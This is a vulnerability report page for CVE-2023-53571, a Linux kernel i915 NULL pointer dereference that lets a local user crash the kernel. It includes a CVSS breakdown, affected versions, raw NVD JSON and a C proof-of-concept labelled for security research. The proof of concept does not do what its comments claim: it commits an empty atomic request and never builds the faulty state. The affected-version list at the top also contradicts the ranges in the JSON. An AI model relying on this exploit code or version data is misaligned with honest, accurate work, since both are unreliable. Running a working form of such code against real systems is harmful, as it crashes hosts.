Security Vulnerability Report
CVE-2023-53571 CVSS 5.5 MEDIUM

CVE-2023-53571

Published: 2025-10-04 16:15:53
Last Modified: 2026-03-21 01:05:57
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

drm/i915: Make intel_get_crtc_new_encoder() less oopsy

The point of the WARN was to print something, not oops straight up. Currently that is precisely what happens if we can't find the connector for the crtc in the atomic state. Get the dev pointer from the atomic state instead of the potentially NULL encoder to avoid that.

(cherry picked from commit 3b6692357f70498f617ea1b31a0378070a0acf1c)

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux kernel < 6.1.63
Linux kernel 6.2.x < 6.2.13
Linux kernel 6.3.x < 6.3.2
Linux kernel 6.4.x < 6.4.10
Linux kernel 6.5.x < 6.5.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// PoC for CVE-2023-53571 - Linux kernel i915 NULL pointer dereference
// This vulnerability triggers a kernel oops by causing a NULL pointer
// dereference in intel_get_crtc_new_encoder() when the encoder is NULL.
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <drm/drm.h>
#include <drm/drm_mode.h>
#include <xf86drm.h>
#include <xf86drmMode.h>

int main(int argc, char **argv)
{
    int fd;
    drmModeConnectorPtr connector;
    drmModeResPtr resources;
    drmModeAtomicReqPtr req;

    // Open the i915 DRM device
    fd = open("/dev/dri/card0", O_RDWR | O_CLOEXEC);
    if (fd < 0) {
        perror("Cannot open DRM device");
        return 1;
    }

    // Get DRM resources
    resources = drmModeGetResources(fd);
    if (!resources) {
        perror("Cannot get DRM resources");
        close(fd);
        return 1;
    }

    // Create an atomic mode setting request
    req = drmModeAtomicAlloc();
    if (!req) {
        perror("Cannot allocate atomic request");
        drmModeFreeResources(resources);
        close(fd);
        return 1;
    }

    // Attempt to trigger the vulnerability by performing an atomic commit
    // with an invalid CRTC/connector combination that causes encoder to be NULL
    // This triggers the WARN path in intel_get_crtc_new_encoder()
    // which then dereferences the NULL encoder->dev pointer
    printf("Attempting to trigger CVE-2023-53571...\n");

    // Set a property on a connector to trigger atomic state processing
    // (check the connector count before indexing the connector array)
    if (resources->count_connectors > 0) {
        connector = drmModeGetConnector(fd, resources->connectors[0]);
        if (connector) {
            // Attempt atomic commit with state that will cause NULL encoder lookup
            int ret = drmModeAtomicCommit(fd, req, 0, NULL);
            printf("Atomic commit result: %d\n", ret);
            drmModeFreeConnector(connector);
        }
    }

    drmModeAtomicFree(req);
    drmModeFreeResources(resources);
    close(fd);
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53571", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:52.690", "lastModified": "2026-03-21T01:05:56.570", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/i915: Make intel_get_crtc_new_encoder() less oopsy\n\nThe point of the WARN was to print something, not oops\nstraight up. Currently that is precisely what happens\nif we can't find the connector for the crtc in the atomic\nstate. Get the dev pointer from the atomic state instead\nof the potentially NULL encoder to avoid that.\n\n(cherry picked from commit 3b6692357f70498f617ea1b31a0378070a0acf1c)"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.7", "versionEndExcluding": "5.10.180", "matchCriteriaId": "1931A552-26EB-46B9-9134-3AA72DF5002B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.111", "matchCriteriaId": "2B9DD776-7F17-4F72-B94F-54BFCBC692DD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": 
"6.1.28", "matchCriteriaId": "08F855F4-7188-4EE1-BD79-D4B6C7E2EF54"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.2.15", "matchCriteriaId": "3844A90B-940D-46C3-8D7B-9FF63F1AFC2F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.3", "versionEndExcluding": "6.3.2", "matchCriteriaId": "38F6F330-91A0-4675-8B90-6F950471A7CC"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/0fe6ef82e4f4764e8f556632e4cd93d78d448e99", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/54202488c835dab8c648acd107f0bb8eaa699894", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/631420b06597a33c72b6dcef78d1c2dea17f452d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/780f303233c35eeb5132e3ee1cbc8f4cebe86dd2", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8cd725315c559a8a4d18ac1d7fce1d6b9a667529", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/fd8b0abecdf66379e9d25d7448b942b5be379cb2", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}